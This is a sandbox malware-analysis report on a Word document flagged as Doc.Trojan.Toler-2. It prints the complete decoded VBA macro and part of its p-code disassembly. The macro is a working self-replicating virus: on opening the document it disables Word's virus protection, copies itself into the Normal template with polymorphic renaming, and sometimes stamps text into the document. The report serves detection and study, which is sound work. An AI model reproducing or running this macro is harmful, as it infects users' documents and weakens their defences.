MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that is triggered by the Document_Open event. This macro is designed to disable virus protection and execute further malicious code, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Trojan.Toler-2' also indicates malicious intent.
Heuristics 3
-
ClamAV: Doc.Trojan.Toler-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Toler-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10479 bytes |
SHA-256: f113a6502a93b33a4606fab6ea3a0bf73d3995e1db4d908189d2acc7c9c6c77a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Tolerance!
Private Type AeaZ
DpkigbZ As Integer
DrvlZ As Integer
QoijZ As Boolean
End Type
Private Sub Document_Close()
End Sub
Private Sub Document_New()
End Sub
Private Sub Document_Open()
Randomize
Options.VirusProtection = False
Dim AsbyieZ As Object, JshshjsvZ As Object
Set AsbyieZ = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set JshshjsvZ = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Dim NudZ As AeaZ, EgacsZ As AeaZ: NudZ = WflwZ(AsbyieZ): EgacsZ = WflwZ(JshshjsvZ)
If EgacsZ.DrvlZ = 0 Then
FewpZ AsbyieZ, JshshjsvZ, NudZ, EgacsZ
Options.SaveNormalPrompt = False
End If
If (NudZ.DrvlZ = 0) Or ((EgacsZ.DrvlZ <> 0) And (NudZ.DrvlZ <> EgacsZ.DrvlZ)) Then
FewpZ JshshjsvZ, AsbyieZ, EgacsZ, NudZ
ElseIf Rnd < 0.3 Then
ActiveDocument.Range(0, 0).InsertParagraphBefore
ActiveDocument.Range(0, 0).InsertBefore "MUD Forever! :-)"
ActiveDocument.SaveAs (ActiveDocument.FullName)
End If
End Sub
Private Sub FewpZ(DpkigbZ As Object, XypmZ As Object, FromP As AeaZ, ToP As AeaZ)
Dim FgoyZ As String, MemyZ
FgoyZ = DpkigbZ.Lines(FromP.DpkigbZ, FromP.DrvlZ)
MemyZ = Array("XfkqZ", "AeaZ", "DpkigbZ", "XypmZ", "EaqayjZ", "DrvlZ", "QoijZ", "AsbyieZ", "JshshjsvZ", "NudZ", "EgacsZ", "FewpZ", "FgoyZ", "IqmbZ", "UedxnoZ", "UvubZ", "WflwZ", "HwvcxZ", "MemyZ")
For i = 0 To 18: HwvcxZ FgoyZ, (MemyZ(i)), XfkqZ(FgoyZ): Next i
If ToP.QoijZ Then XypmZ.DeleteLines 1, XypmZ.CountOfLines
XypmZ.AddFromString FgoyZ
End Sub
Private Function XfkqZ(FgoyZ As String) As String
Dim IqmbZ As String: IqmbZ = ""
While (InStr(FgoyZ, IqmbZ) <> 0) Or (Len(IqmbZ) < 3)
IqmbZ = ""
For i = 1 To 10
If Rnd > 0.5 Then
If Len(IqmbZ) = 0 Then
IqmbZ = IqmbZ + Chr(Int(Rnd * 25 + 65))
Else: IqmbZ = IqmbZ + Chr(Int(Rnd * 25 + 97))
End If
End If
Next i
IqmbZ = IqmbZ + "Z"
Wend
XfkqZ = IqmbZ
End Function
Private Sub HwvcxZ(FgoyZ As String, UedxnoZ As String, UvubZ As String)
Dim i As Long
i = 1
While InStr(i, FgoyZ, UedxnoZ) <> 0
i = InStr(i, FgoyZ, UedxnoZ)
FgoyZ = Left(FgoyZ, i - 1) + UvubZ + Mid$(FgoyZ, i + Len(UedxnoZ))
Index = Index + 1
Wend
End Sub
Private Function WflwZ(EaqayjZ As Object) As AeaZ
WflwZ.DpkigbZ = 0
WflwZ.DrvlZ = 0
WflwZ.QoijZ = False
For i = 1 To EaqayjZ.CountOfLines
If EaqayjZ.Lines(i, 1) = "' Tolerance!" Then WflwZ.DpkigbZ = i
If EaqayjZ.Lines(i, 1) = "End Function 'Tolerance!" Then WflwZ.DrvlZ = i - WflwZ.DpkigbZ + 1
If InStr(EaqayjZ.Lines(i, 1), "Private Sub Document_Open()") = 1 Then WflwZ.QoijZ = True
Next i
End Function 'Tolerance!
' Processing file: /opt/analyzer/scan_staging/c78387dbd5624dc1a0bad6d33c9887e0.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 10993 bytes
' Line #0:
' QuoteRem 0x0000 0x000B " Tolerance!"
' Line #1:
' Type (Private) AeaZ
' Line #2:
' DimImplicit
' VarDefn DpkigbZ (As Integer)
' Line #3:
' DimImplicit
' VarDefn DrvlZ (As Integer)
' Line #4:
' DimImplicit
' VarDefn QoijZ (As Boolean)
' Line #5:
' EndType
' Line #6:
' Line #7:
' FuncDefn (Private Sub Document_Close())
' Line #8:
' Line #9:
' EndSub
' Line #10:
' Line #11:
' FuncDefn (Private Sub Document_New())
' Line #12:
' Line #13:
' EndSub
' Line #14:
' Line #15:
' FuncDefn (Private Sub Document_Open())
' Line #16:
' ArgsCall Read 0x0000
' Line #17:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #18:
' Dim
' VarDefn AsbyieZ (As Object)
' VarDefn JshshjsvZ (As Object)
' Line #19:
' SetStmt
' LitDI2 0x0001
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.